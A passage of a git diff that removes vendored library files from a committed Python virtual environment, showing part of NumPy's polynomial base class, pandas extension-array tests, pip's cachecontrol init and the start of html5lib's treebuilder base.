self.__class__(quo, self.domain, self.window, self.symbol) - rem = self.__class__(rem, self.domain, self.window, self.symbol) - return quo, rem - - def __pow__(self, other): - coef = self._pow(self.coef, other, maxpower=self.maxpower) - res = self.__class__(coef, self.domain, self.window, self.symbol) - return res - - def __radd__(self, other): - try: - coef = self._add(other, self.coef) - except Exception: - return NotImplemented - return self.__class__(coef, self.domain, self.window, self.symbol) - - def __rsub__(self, other): - try: - coef = self._sub(other, self.coef) - except Exception: - return NotImplemented - return self.__class__(coef, self.domain, self.window, self.symbol) - - def __rmul__(self, other): - try: - coef = self._mul(other, self.coef) - except Exception: - return NotImplemented - return self.__class__(coef, self.domain, self.window, self.symbol) - - def __rdiv__(self, other): - # set to __floordiv__ /. - return self.__rfloordiv__(other) - - def __rtruediv__(self, other): - # An instance of ABCPolyBase is not considered a - # Number. - return NotImplemented - - def __rfloordiv__(self, other): - res = self.__rdivmod__(other) - if res is NotImplemented: - return res - return res[0] - - def __rmod__(self, other): - res = self.__rdivmod__(other) - if res is NotImplemented: - return res - return res[1] - - def __rdivmod__(self, other): - try: - quo, rem = self._div(other, self.coef) - except ZeroDivisionError: - raise - except Exception: - return NotImplemented - quo = self.__class__(quo, self.domain, self.window, self.symbol) - rem = self.__class__(rem, self.domain, self.window, self.symbol) - return quo, rem - - def __eq__(self, other): - res = (isinstance(other, self.__class__) and - np.all(self.domain == other.domain) and - np.all(self.window == other.window) and - (self.coef.shape == other.coef.shape) and - np.all(self.coef == other.coef) and - (self.symbol == other.symbol)) - return res - - def __ne__(self, other): - return not self.__eq__(other) - - # - # Extra methods. - # - - def copy(self): - """Return a copy. - - Returns - ------- - new_series : series - Copy of self. - - """ - return self.__class__(self.coef, self.domain, self.window, self.symbol) - - def degree(self): - """The degree of the series. - - .. versionadded:: 1.5.0 - - Returns - ------- - degree : int - Degree of the series, one less than the number of coefficients. - - Examples - -------- - - Create a polynomial object for ``1 + 7*x + 4*x**2``: - - >>> poly = np.polynomial.Polynomial([1, 7, 4]) - >>> print(poly) - 1.0 + 7.0·x + 4.0·x² - >>> poly.degree() - 2 - - Note that this method does not check for non-zero coefficients. - You must trim the polynomial to remove any trailing zeroes: - - >>> poly = np.polynomial.Polynomial([1, 7, 0]) - >>> print(poly) - 1.0 + 7.0·x + 0.0·x² - >>> poly.degree() - 2 - >>> poly.trim().degree() - 1 - - """ - return len(self) - 1 - - def cutdeg(self, deg): - """Truncate series to the given degree. - - Reduce the degree of the series to `deg` by discarding the - high order terms. If `deg` is greater than the current degree a - copy of the current series is returned. This can be useful in least - squares where the coefficients of the high degree terms may be very - small. - - .. versionadded:: 1.5.0 - - Parameters - ---------- - deg : non-negative int - The series is reduced to degree `deg` by discarding the high - order terms. The value of `deg` must be a non-negative integer. - - Returns - ------- - new_series : series - New instance of series with reduced degree. - - """ - return self.truncate(deg + 1) - - def trim(self, tol=0): - """Remove trailing coefficients - - Remove trailing coefficients until a coefficient is reached whose - absolute value greater than `tol` or the beginning of the series is - reached. If all the coefficients would be removed the series is set - to ``[0]``. A new series instance is returned with the new - coefficients. The current instance remains unchanged. - - Parameters - ---------- - tol : non-negative number. - All trailing coefficients less than `tol` will be removed. - - Returns - ------- - new_series : series - New instance of series with trimmed coefficients. - - """ - coef = pu.trimcoef(self.coef, tol) - return self.__class__(coef, self.domain, self.window, self.symbol) - - def truncate(self, size): - """Truncate series to length `size`. - - Reduce the series to length `size` by discarding the high - degree terms. The value of `size` must be a positive integer. This - can be useful in least squares where the coefficients of the - high degree terms may be very small. - - Parameters - ---------- - size : positive int - The series is reduced to length `size` by discarding the high - degree terms. The value of `size` must be a positive integer. - - Returns - ------- - new_series : series - New instance of series with truncated coefficients. - - """ - isize = int(size) - if isize != size or isize < 1: - raise ValueError("size must be a positive integer") - if isize >= len(self.coef): - coef = self.coef - else: - coef = self.coef[:isize] - return self.__class__(coef, self.domain, self.window, self.symbol) - - def convert(self, domain=None, kind=None, window=None): - """Convert series to a different kind and/or domain and/or window. - - Parameters - ---------- - domain : array_like, optional - The domain of the converted series. If the value is None, - the default domain of `kind` is used. - kind : class, optional - The polynomial series type class to which the current instance - should be converted. If kind is None, then the class of the - current instance is used. - window : array_like, optional - The window of the converted series. If the value is None, - the default window of `kind` is used. - - Returns - ------- - new_series : series - The returned class can be of different type than the current - instance and/or have a different domain and/or different - window. - - Notes - ----- - Conversion between domains and class types can result in - numerically ill defined series. - - """ - if kind is None: - kind = self.__class__ - if domain is None: - domain = kind.domain - if window is None: - window = kind.window - return self(kind.identity(domain, window=window, symbol=self.symbol)) - - def mapparms(self): - """Return the mapping parameters. - - The returned values define a linear map ``off + scl*x`` that is - applied to the input arguments before the series is evaluated. The - map depends on the ``domain`` and ``window``; if the current - ``domain`` is equal to the ``window`` the resulting map is the - identity. If the coefficients of the series instance are to be - used by themselves outside this class, then the linear function - must be substituted for the ``x`` in the standard representation of - the base polynomials. - - Returns - ------- - off, scl : float or complex - The mapping function is defined by ``off + scl*x``. - - Notes - ----- - If the current domain is the interval ``[l1, r1]`` and the window - is ``[l2, r2]``, then the linear mapping function ``L`` is - defined by the equations:: - - L(l1) = l2 - L(r1) = r2 - - """ - return pu.mapparms(self.domain, self.window) - - def integ(self, m=1, k=[], lbnd=None): - """Integrate. - - Return a series instance that is the definite integral of the - current series. - - Parameters - ---------- - m : non-negative int - The number of integrations to perform. - k : array_like - Integration constants. The first constant is applied to the - first integration, the second to the second, and so on. The - list of values must less than or equal to `m` in length and any - missing values are set to zero. - lbnd : Scalar - The lower bound of the definite integral. - - Returns - ------- - new_series : series - A new series representing the integral. The domain is the same - as the domain of the integrated series. - - """ - off, scl = self.mapparms() - if lbnd is None: - lbnd = 0 - else: - lbnd = off + scl*lbnd - coef = self._int(self.coef, m, k, lbnd, 1./scl) - return self.__class__(coef, self.domain, self.window, self.symbol) - - def deriv(self, m=1): - """Differentiate. - - Return a series instance of that is the derivative of the current - series. - - Parameters - ---------- - m : non-negative int - Find the derivative of order `m`. - - Returns - ------- - new_series : series - A new series representing the derivative. The domain is the same - as the domain of the differentiated series. - - """ - off, scl = self.mapparms() - coef = self._der(self.coef, m, scl) - return self.__class__(coef, self.domain, self.window, self.symbol) - - def roots(self): - """Return the roots of the series polynomial. - - Compute the roots for the series. Note that the accuracy of the - roots decreases the further outside the `domain` they lie. - - Returns - ------- - roots : ndarray - Array containing the roots of the series. - - """ - roots = self._roots(self.coef) - return pu.mapdomain(roots, self.window, self.domain) - - def linspace(self, n=100, domain=None): - """Return x, y values at equally spaced points in domain. - - Returns the x, y values at `n` linearly spaced points across the - domain. Here y is the value of the polynomial at the points x. By - default the domain is the same as that of the series instance. - This method is intended mostly as a plotting aid. - - .. versionadded:: 1.5.0 - - Parameters - ---------- - n : int, optional - Number of point pairs to return. The default value is 100. - domain : {None, array_like}, optional - If not None, the specified domain is used instead of that of - the calling instance. It should be of the form ``[beg,end]``. - The default is None which case the class domain is used. - - Returns - ------- - x, y : ndarray - x is equal to linspace(self.domain[0], self.domain[1], n) and - y is the series evaluated at element of x. - - """ - if domain is None: - domain = self.domain - x = np.linspace(domain[0], domain[1], n) - y = self(x) - return x, y - - @classmethod - def fit(cls, x, y, deg, domain=None, rcond=None, full=False, w=None, - window=None, symbol='x'): - """Least squares fit to data. - - Return a series instance that is the least squares fit to the data - `y` sampled at `x`. The domain of the returned instance can be - specified and this will often result in a superior fit with less - chance of ill conditioning. - - Parameters - ---------- - x : array_like, shape (M,) - x-coordinates of the M sample points ``(x[i], y[i])``. - y : array_like, shape (M,) - y-coordinates of the M sample points ``(x[i], y[i])``. - deg : int or 1-D array_like - Degree(s) of the fitting polynomials. If `deg` is a single integer - all terms up to and including the `deg`'th term are included in the - fit. For NumPy versions >= 1.11.0 a list of integers specifying the - degrees of the terms to include may be used instead. - domain : {None, [beg, end], []}, optional - Domain to use for the returned series. If ``None``, - then a minimal domain that covers the points `x` is chosen. If - ``[]`` the class domain is used. The default value was the - class domain in NumPy 1.4 and ``None`` in later versions. - The ``[]`` option was added in numpy 1.5.0. - rcond : float, optional - Relative condition number of the fit. Singular values smaller - than this relative to the largest singular value will be - ignored. The default value is len(x)*eps, where eps is the - relative precision of the float type, about 2e-16 in most - cases. - full : bool, optional - Switch determining nature of return value. When it is False - (the default) just the coefficients are returned, when True - diagnostic information from the singular value decomposition is - also returned. - w : array_like, shape (M,), optional - Weights. If not None, the weight ``w[i]`` applies to the unsquared - residual ``y[i] - y_hat[i]`` at ``x[i]``. Ideally the weights are - chosen so that the errors of the products ``w[i]*y[i]`` all have - the same variance. When using inverse-variance weighting, use - ``w[i] = 1/sigma(y[i])``. The default value is None. - - .. versionadded:: 1.5.0 - window : {[beg, end]}, optional - Window to use for the returned series. The default - value is the default class domain - - .. versionadded:: 1.6.0 - symbol : str, optional - Symbol representing the independent variable. Default is 'x'. - - Returns - ------- - new_series : series - A series that represents the least squares fit to the data and - has the domain and window specified in the call. If the - coefficients for the unscaled and unshifted basis polynomials are - of interest, do ``new_series.convert().coef``. - - [resid, rank, sv, rcond] : list - These values are only returned if ``full == True`` - - - resid -- sum of squared residuals of the least squares fit - - rank -- the numerical rank of the scaled Vandermonde matrix - - sv -- singular values of the scaled Vandermonde matrix - - rcond -- value of `rcond`. - - For more details, see `linalg.lstsq`. - - """ - if domain is None: - domain = pu.getdomain(x) - elif type(domain) is list and len(domain) == 0: - domain = cls.domain - - if window is None: - window = cls.window - - xnew = pu.mapdomain(x, domain, window) - res = cls._fit(xnew, y, deg, w=w, rcond=rcond, full=full) - if full: - [coef, status] = res - return ( - cls(coef, domain=domain, window=window, symbol=symbol), status - ) - else: - coef = res - return cls(coef, domain=domain, window=window, symbol=symbol) - - @classmethod - def fromroots(cls, roots, domain=[], window=None, symbol='x'): - """Return series instance that has the specified roots. - - Returns a series representing the product - ``(x - r[0])*(x - r[1])*...*(x - r[n-1])``, where ``r`` is a - list of roots. - - Parameters - ---------- - roots : array_like - List of roots. - domain : {[], None, array_like}, optional - Domain for the resulting series. If None the domain is the - interval from the smallest root to the largest. If [] the - domain is the class domain. The default is []. - window : {None, array_like}, optional - Window for the returned series. If None the class window is - used. The default is None. - symbol : str, optional - Symbol representing the independent variable. Default is 'x'. - - Returns - ------- - new_series : series - Series with the specified roots. - - """ - [roots] = pu.as_series([roots], trim=False) - if domain is None: - domain = pu.getdomain(roots) - elif type(domain) is list and len(domain) == 0: - domain = cls.domain - - if window is None: - window = cls.window - - deg = len(roots) - off, scl = pu.mapparms(domain, window) - rnew = off + scl*roots - coef = cls._fromroots(rnew) / scl**deg - return cls(coef, domain=domain, window=window, symbol=symbol) - - @classmethod - def identity(cls, domain=None, window=None, symbol='x'): - """Identity function. - - If ``p`` is the returned series, then ``p(x) == x`` for all - values of x. - - Parameters - ---------- - domain : {None, array_like}, optional - If given, the array must be of the form ``[beg, end]``, where - ``beg`` and ``end`` are the endpoints of the domain. If None is - given then the class domain is used. The default is None. - window : {None, array_like}, optional - If given, the resulting array must be if the form - ``[beg, end]``, where ``beg`` and ``end`` are the endpoints of - the window. If None is given then the class window is used. The - default is None. - symbol : str, optional - Symbol representing the independent variable. Default is 'x'. - - Returns - ------- - new_series : series - Series of representing the identity. - - """ - if domain is None: - domain = cls.domain - if window is None: - window = cls.window - off, scl = pu.mapparms(window, domain) - coef = cls._line(off, scl) - return cls(coef, domain, window, symbol) - - @classmethod - def basis(cls, deg, domain=None, window=None, symbol='x'): - """Series basis polynomial of degree `deg`. - - Returns the series representing the basis polynomial of degree `deg`. - - .. versionadded:: 1.7.0 - - Parameters - ---------- - deg : int - Degree of the basis polynomial for the series. Must be >= 0. - domain : {None, array_like}, optional - If given, the array must be of the form ``[beg, end]``, where - ``beg`` and ``end`` are the endpoints of the domain. If None is - given then the class domain is used. The default is None. - window : {None, array_like}, optional - If given, the resulting array must be if the form - ``[beg, end]``, where ``beg`` and ``end`` are the endpoints of - the window. If None is given then the class window is used. The - default is None. - symbol : str, optional - Symbol representing the independent variable. Default is 'x'. - - Returns - ------- - new_series : series - A series with the coefficient of the `deg` term set to one and - all others zero. - - """ - if domain is None: - domain = cls.domain - if window is None: - window = cls.window - ideg = int(deg) - - if ideg != deg or ideg < 0: - raise ValueError("deg must be non-negative integer") - return cls([0]*ideg + [1], domain, window, symbol) - - @classmethod - def cast(cls, series, domain=None, window=None): - """Convert series to series of this class. - - The `series` is expected to be an instance of some polynomial - series of one of the types supported by by the numpy.polynomial - module, but could be some other class that supports the convert - method. - - .. versionadded:: 1.7.0 - - Parameters - ---------- - series : series - The series instance to be converted. - domain : {None, array_like}, optional - If given, the array must be of the form ``[beg, end]``, where - ``beg`` and ``end`` are the endpoints of the domain. If None is - given then the class domain is used. The default is None. - window : {None, array_like}, optional - If given, the resulting array must be if the form - ``[beg, end]``, where ``beg`` and ``end`` are the endpoints of - the window. If None is given then the class window is used. The - default is None. - - Returns - ------- - new_series : series - A series of the same kind as the calling class and equal to - `series` when evaluated. - - See Also - -------- - convert : similar instance method - - """ - if domain is None: - domain = cls.domain - if window is None: - window = cls.window - return series.convert(domain, cls, window) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/arrays/floating/test_comparison.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/arrays/floating/test_comparison.py deleted file mode 100644 index a429649f1ce1dc10fc9610faa73a81dd94255b37..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/arrays/floating/test_comparison.py +++ /dev/null @@ -1,65 +0,0 @@ -import numpy as np -import pytest - -import pandas as pd -import pandas._testing as tm -from pandas.core.arrays import FloatingArray -from pandas.tests.arrays.masked_shared import ( - ComparisonOps, - NumericOps, -) - - -class TestComparisonOps(NumericOps, ComparisonOps): - @pytest.mark.parametrize("other", [True, False, pd.NA, -1.0, 0.0, 1]) - def test_scalar(self, other, comparison_op, dtype): - ComparisonOps.test_scalar(self, other, comparison_op, dtype) - - def test_compare_with_integerarray(self, comparison_op): - op = comparison_op - a = pd.array([0, 1, None] * 3, dtype="Int64") - b = pd.array([0] * 3 + [1] * 3 + [None] * 3, dtype="Float64") - other = b.astype("Int64") - expected = op(a, other) - result = op(a, b) - tm.assert_extension_array_equal(result, expected) - expected = op(other, a) - result = op(b, a) - tm.assert_extension_array_equal(result, expected) - - -def test_equals(): - # GH-30652 - # equals is generally tested in /tests/extension/base/methods, but this - # specifically tests that two arrays of the same class but different dtype - # do not evaluate equal - a1 = pd.array([1, 2, None], dtype="Float64") - a2 = pd.array([1, 2, None], dtype="Float32") - assert a1.equals(a2) is False - - -def test_equals_nan_vs_na(): - # GH#44382 - - mask = np.zeros(3, dtype=bool) - data = np.array([1.0, np.nan, 3.0], dtype=np.float64) - - left = FloatingArray(data, mask) - assert left.equals(left) - tm.assert_extension_array_equal(left, left) - - assert left.equals(left.copy()) - assert left.equals(FloatingArray(data.copy(), mask.copy())) - - mask2 = np.array([False, True, False], dtype=bool) - data2 = np.array([1.0, 2.0, 3.0], dtype=np.float64) - right = FloatingArray(data2, mask2) - assert right.equals(right) - tm.assert_extension_array_equal(right, right) - - assert not left.equals(right) - - # with mask[1] = True, the only difference is data[1], which should - # not matter for equals - mask[1] = True - assert left.equals(right) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/extension/json/test_json.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/extension/json/test_json.py deleted file mode 100644 index 9e1a4fb5da2512213fe0dd110af8eb9b897caceb..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/extension/json/test_json.py +++ /dev/null @@ -1,379 +0,0 @@ -import collections -import operator -import sys - -import pytest - -import pandas as pd -import pandas._testing as tm -from pandas.tests.extension import base -from pandas.tests.extension.json.array import ( - JSONArray, - JSONDtype, - make_data, -) - - -@pytest.fixture -def dtype(): - return JSONDtype() - - -@pytest.fixture -def data(): - """Length-100 PeriodArray for semantics test.""" - data = make_data() - - # Why the while loop? NumPy is unable to construct an ndarray from - # equal-length ndarrays. Many of our operations involve coercing the - # EA to an ndarray of objects. To avoid random test failures, we ensure - # that our data is coercible to an ndarray. Several tests deal with only - # the first two elements, so that's what we'll check. - - while len(data[0]) == len(data[1]): - data = make_data() - - return JSONArray(data) - - -@pytest.fixture -def data_missing(): - """Length 2 array with [NA, Valid]""" - return JSONArray([{}, {"a": 10}]) - - -@pytest.fixture -def data_for_sorting(): - return JSONArray([{"b": 1}, {"c": 4}, {"a": 2, "c": 3}]) - - -@pytest.fixture -def data_missing_for_sorting(): - return JSONArray([{"b": 1}, {}, {"a": 4}]) - - -@pytest.fixture -def na_cmp(): - return operator.eq - - -@pytest.fixture -def data_for_grouping(): - return JSONArray( - [ - {"b": 1}, - {"b": 1}, - {}, - {}, - {"a": 0, "c": 2}, - {"a": 0, "c": 2}, - {"b": 1}, - {"c": 2}, - ] - ) - - -class BaseJSON: - pass - - -class TestDtype(BaseJSON, base.BaseDtypeTests): - pass - - -class TestInterface(BaseJSON, base.BaseInterfaceTests): - @pytest.mark.xfail( - reason="comparison method not implemented for JSONArray (GH-37867)" - ) - def test_contains(self, data): - # GH-37867 - super().test_contains(data) - - -class TestConstructors(BaseJSON, base.BaseConstructorsTests): - @pytest.mark.xfail(reason="not implemented constructor from dtype") - def test_from_dtype(self, data): - # construct from our dtype & string dtype - super().test_from_dtype(data) - - @pytest.mark.xfail(reason="RecursionError, GH-33900") - def test_series_constructor_no_data_with_index(self, dtype, na_value): - # RecursionError: maximum recursion depth exceeded in comparison - rec_limit = sys.getrecursionlimit() - try: - # Limit to avoid stack overflow on Windows CI - sys.setrecursionlimit(100) - super().test_series_constructor_no_data_with_index(dtype, na_value) - finally: - sys.setrecursionlimit(rec_limit) - - @pytest.mark.xfail(reason="RecursionError, GH-33900") - def test_series_constructor_scalar_na_with_index(self, dtype, na_value): - # RecursionError: maximum recursion depth exceeded in comparison - rec_limit = sys.getrecursionlimit() - try: - # Limit to avoid stack overflow on Windows CI - sys.setrecursionlimit(100) - super().test_series_constructor_scalar_na_with_index(dtype, na_value) - finally: - sys.setrecursionlimit(rec_limit) - - @pytest.mark.xfail(reason="collection as scalar, GH-33901") - def test_series_constructor_scalar_with_index(self, data, dtype): - # TypeError: All values must be of type - rec_limit = sys.getrecursionlimit() - try: - # Limit to avoid stack overflow on Windows CI - sys.setrecursionlimit(100) - super().test_series_constructor_scalar_with_index(data, dtype) - finally: - sys.setrecursionlimit(rec_limit) - - -class TestReshaping(BaseJSON, base.BaseReshapingTests): - @pytest.mark.xfail(reason="Different definitions of NA") - def test_stack(self): - """ - The test does .astype(object).stack(future_stack=True). If we happen to have - any missing values in `data`, then we'll end up with different - rows since we consider `{}` NA, but `.astype(object)` doesn't. - """ - super().test_stack() - - @pytest.mark.xfail(reason="dict for NA") - def test_unstack(self, data, index): - # The base test has NaN for the expected NA value. - # this matches otherwise - return super().test_unstack(data, index) - - -class TestGetitem(BaseJSON, base.BaseGetitemTests): - pass - - -class TestIndex(BaseJSON, base.BaseIndexTests): - pass - - -class TestMissing(BaseJSON, base.BaseMissingTests): - @pytest.mark.xfail(reason="Setting a dict as a scalar") - def test_fillna_series(self): - """We treat dictionaries as a mapping in fillna, not a scalar.""" - super().test_fillna_series() - - @pytest.mark.xfail(reason="Setting a dict as a scalar") - def test_fillna_frame(self): - """We treat dictionaries as a mapping in fillna, not a scalar.""" - super().test_fillna_frame() - - -unhashable = pytest.mark.xfail(reason="Unhashable") - - -class TestReduce(base.BaseReduceTests): - pass - - -class TestMethods(BaseJSON, base.BaseMethodsTests): - @unhashable - def test_value_counts(self, all_data, dropna): - super().test_value_counts(all_data, dropna) - - @unhashable - def test_value_counts_with_normalize(self, data): - super().test_value_counts_with_normalize(data) - - @unhashable - def test_sort_values_frame(self): - # TODO (EA.factorize): see if _values_for_factorize allows this. - super().test_sort_values_frame() - - @pytest.mark.parametrize("ascending", [True, False]) - def test_sort_values(self, data_for_sorting, ascending, sort_by_key): - super().test_sort_values(data_for_sorting, ascending, sort_by_key) - - @pytest.mark.parametrize("ascending", [True, False]) - def test_sort_values_missing( - self, data_missing_for_sorting, ascending, sort_by_key - ): - super().test_sort_values_missing( - data_missing_for_sorting, ascending, sort_by_key - ) - - @pytest.mark.xfail(reason="combine for JSONArray not supported") - def test_combine_le(self, data_repeated): - super().test_combine_le(data_repeated) - - @pytest.mark.xfail( - reason="combine for JSONArray not supported - " - "may pass depending on random data", - strict=False, - raises=AssertionError, - ) - def test_combine_first(self, data): - super().test_combine_first(data) - - @pytest.mark.xfail(reason="broadcasting error") - def test_where_series(self, data, na_value): - # Fails with - # *** ValueError: operands could not be broadcast together - # with shapes (4,) (4,) (0,) - super().test_where_series(data, na_value) - - @pytest.mark.xfail(reason="Can't compare dicts.") - def test_searchsorted(self, data_for_sorting): - super().test_searchsorted(data_for_sorting) - - @pytest.mark.xfail(reason="Can't compare dicts.") - def test_equals(self, data, na_value, as_series): - super().test_equals(data, na_value, as_series) - - @pytest.mark.skip("fill-value is interpreted as a dict of values") - def test_fillna_copy_frame(self, data_missing): - super().test_fillna_copy_frame(data_missing) - - def test_equals_same_data_different_object( - self, data, using_copy_on_write, request - ): - if using_copy_on_write: - mark = pytest.mark.xfail(reason="Fails with CoW") - request.node.add_marker(mark) - super().test_equals_same_data_different_object(data) - - -class TestCasting(BaseJSON, base.BaseCastingTests): - @pytest.mark.xfail(reason="failing on np.array(self, dtype=str)") - def test_astype_str(self): - """This currently fails in NumPy on np.array(self, dtype=str) with - - *** ValueError: setting an array element with a sequence - """ - super().test_astype_str() - - -# We intentionally don't run base.BaseSetitemTests because pandas' -# internals has trouble setting sequences of values into scalar positions. - - -class TestGroupby(BaseJSON, base.BaseGroupbyTests): - @unhashable - def test_groupby_extension_transform(self): - """ - This currently fails in Series.name.setter, since the - name must be hashable, but the value is a dictionary. - I think this is what we want, i.e. `.name` should be the original - values, and not the values for factorization. - """ - super().test_groupby_extension_transform() - - @unhashable - def test_groupby_extension_apply(self): - """ - This fails in Index._do_unique_check with - - > hash(val) - E TypeError: unhashable type: 'UserDict' with - - I suspect that once we support Index[ExtensionArray], - we'll be able to dispatch unique. - """ - super().test_groupby_extension_apply() - - @unhashable - def test_groupby_extension_agg(self): - """ - This fails when we get to tm.assert_series_equal when left.index - contains dictionaries, which are not hashable. - """ - super().test_groupby_extension_agg() - - @unhashable - def test_groupby_extension_no_sort(self): - """ - This fails when we get to tm.assert_series_equal when left.index - contains dictionaries, which are not hashable. - """ - super().test_groupby_extension_no_sort() - - -class TestArithmeticOps(BaseJSON, base.BaseArithmeticOpsTests): - def test_arith_frame_with_scalar(self, data, all_arithmetic_operators, request): - if len(data[0]) != 1: - mark = pytest.mark.xfail(reason="raises in coercing to Series") - request.node.add_marker(mark) - super().test_arith_frame_with_scalar(data, all_arithmetic_operators) - - -class TestComparisonOps(BaseJSON, base.BaseComparisonOpsTests): - def test_compare_array(self, data, comparison_op, request): - if comparison_op.__name__ in ["eq", "ne"]: - mark = pytest.mark.xfail(reason="Comparison methods not implemented") - request.node.add_marker(mark) - super().test_compare_array(data, comparison_op) - - -class TestPrinting(BaseJSON, base.BasePrintingTests): - pass - - -def custom_assert_series_equal(left, right, *args, **kwargs): - # NumPy doesn't handle an array of equal-length UserDicts. - # The default assert_series_equal eventually does a - # Series.values, which raises. We work around it by - # converting the UserDicts to dicts. - if left.dtype.name == "json": - assert left.dtype == right.dtype - left = pd.Series( - JSONArray(left.values.astype(object)), index=left.index, name=left.name - ) - right = pd.Series( - JSONArray(right.values.astype(object)), - index=right.index, - name=right.name, - ) - tm.assert_series_equal(left, right, *args, **kwargs) - - -def custom_assert_frame_equal(left, right, *args, **kwargs): - obj_type = kwargs.get("obj", "DataFrame") - tm.assert_index_equal( - left.columns, - right.columns, - exact=kwargs.get("check_column_type", "equiv"), - check_names=kwargs.get("check_names", True), - check_exact=kwargs.get("check_exact", False), - check_categorical=kwargs.get("check_categorical", True), - obj=f"{obj_type}.columns", - ) - - jsons = (left.dtypes == "json").index - - for col in jsons: - custom_assert_series_equal(left[col], right[col], *args, **kwargs) - - left = left.drop(columns=jsons) - right = right.drop(columns=jsons) - tm.assert_frame_equal(left, right, *args, **kwargs) - - -def test_custom_asserts(): - # This would always trigger the KeyError from trying to put - # an array of equal-length UserDicts inside an ndarray. - data = JSONArray( - [ - collections.UserDict({"a": 1}), - collections.UserDict({"b": 2}), - collections.UserDict({"c": 3}), - ] - ) - a = pd.Series(data) - custom_assert_series_equal(a, a) - custom_assert_frame_equal(a.to_frame(), a.to_frame()) - - b = pd.Series(data.take([0, 0, 1])) - msg = r"Series are different" - with pytest.raises(AssertionError, match=msg): - custom_assert_series_equal(a, b) - - with pytest.raises(AssertionError, match=msg): - custom_assert_frame_equal(a.to_frame(), b.to_frame()) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/series/__init__.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/series/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/cachecontrol/__init__.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/cachecontrol/__init__.py deleted file mode 100644 index 8435d628d206a6587e969b4bdf6d5468af82f191..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/cachecontrol/__init__.py +++ /dev/null @@ -1,18 +0,0 @@ -# SPDX-FileCopyrightText: 2015 Eric Larson -# -# SPDX-License-Identifier: Apache-2.0 - -"""CacheControl import Interface. - -Make it easy to import from cachecontrol without long namespaces. -""" -__author__ = "Eric Larson" -__email__ = "eric@ionrock.org" -__version__ = "0.12.10" - -from .wrapper import CacheControl -from .adapter import CacheControlAdapter -from .controller import CacheController - -import logging -logging.getLogger(__name__).addHandler(logging.NullHandler()) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/html5lib/treebuilders/base.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/html5lib/treebuilders/base.py deleted file mode 100644 index 965fce29d3b9e01e9e9374a3d6318badeca7e1e1..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/html5lib/treebuilders/base.py +++ /dev/null @@ -1,417 +0,0 @@ -from __future__ import absolute_import, division, unicode_literals -from pip._vendor.six import text_type - -from ..constants import scopingElements, tableInsertModeElements, namespaces - -# The scope markers are inserted when entering object elements, -# marquees, table cells, and table captions, and are used to prevent formatting -# from "leaking" into tables, object elements, and marquees. -Marker = None - -listElementsMap = { - None: (frozenset(scopingElements), False), - "button": (frozenset(scopingElements | {(namespaces["html"], "button")}), False), - "list": (frozenset(scopingElements | {(namespaces["html"], "ol"), - (namespaces["html"], "ul")}), False), - "table": (frozenset([(namespaces["html"], "html"), - (namespaces["html"], "table")]), False), - "select": (frozenset([(namespaces["html"], "optgroup"), - (namespaces["html"], "option")]), True) -} - - -class Node(object): - """Represents an item in the tree""" - def __init__(self, name): - """Creates a Node - - :arg name: The tag name associated with the node - - """ - # The tag name associated with the node - self.name = name - # The parent of the current node (or None for the document node) - self.parent = None - # The value of the current node (applies to text nodes and comments) - self.value = None - # A dict holding name -> value pairs for attributes of the node - self.attributes = {} - # A list of child nodes of the current node. This must include all - # elements but not necessarily other node types. - self.childNodes = [] - # A list of miscellaneous flags that can be set on the node. - self._flags = [] - - def __str__(self): - attributesStr = " ".join(["%s=\"%s\"" % (name, value) - for name, value in - self.attributes.items()]) - if attributesStr: - return "<%s %s>" % (self.name, attributesStr) - else: - return "<%s>" % (self.name) - - def __repr__(self): - return "<%s>" % (self.name) - - def appendChild(self, node): - """Insert node as a child of the current node - - :arg node: the node to insert - - """ - raise NotImplementedError - - def insertText(self, data, insertBefore=None): - """Insert data as text in the current node, positioned before the - start of node insertBefore or to the end of the node's text. - - :arg data: the data to insert - - :arg insertBefore: True if you want to insert the text before the node - and False if you want to insert it after the node - - """ - raise NotImplementedError - - def insertBefore(self, node, refNode): - """Insert node as a child of the current node, before refNode in the - list of child nodes. Raises ValueError if refNode is not a child of - the current node - - :arg node: the node to insert - - :arg refNode: the child node to insert the node before - - """ - raise NotImplementedError - - def removeChild(self, node): - """Remove node from the children of the current node - - :arg node: the child node to remove - - """ - raise NotImplementedError - - def reparentChildren(self, newParent): - """Move all the children of the current node to newParent. - This is needed so that trees that don't store text as nodes move the - text in the correct way - - :arg newParent: the node to move all this node's children to - - """ - # XXX - should this method be made more general? - for child in self.childNodes: - newParent.appendChild(child) - self.childNodes = [] - - def cloneNode(self): - """Return a shallow copy of the current node i.e. a node with the same - name and attributes but with no parent or child nodes - """ - raise NotImplementedError - - def hasContent(self): - """Return true if the node has children or text, false otherwise - """ - raise NotImplementedError - - -class ActiveFormattingElements(list): - def append(self, node): - equalCount = 0 - if node != Marker: - for element in self[::-1]: - if element == Marker: - break - if self.nodesEqual(element, node): - equalCount += 1 - if equalCount == 3: - self.remove(element) - break - list.append(self, node) - - def nodesEqual(self, node1, node2): - if not node1.nameTuple == node2.nameTuple: - return False - - if not node1.attributes == node2.attributes: - return False - - return True - - -class TreeBuilder(object): - """Base treebuilder implementation - - * documentClass - the class to use for the bottommost node of a document - * elementClass - the class to use for HTML Elements - * commentClass - the class to use for comments - * doctypeClass - the class to use for doctypes - - """ - # 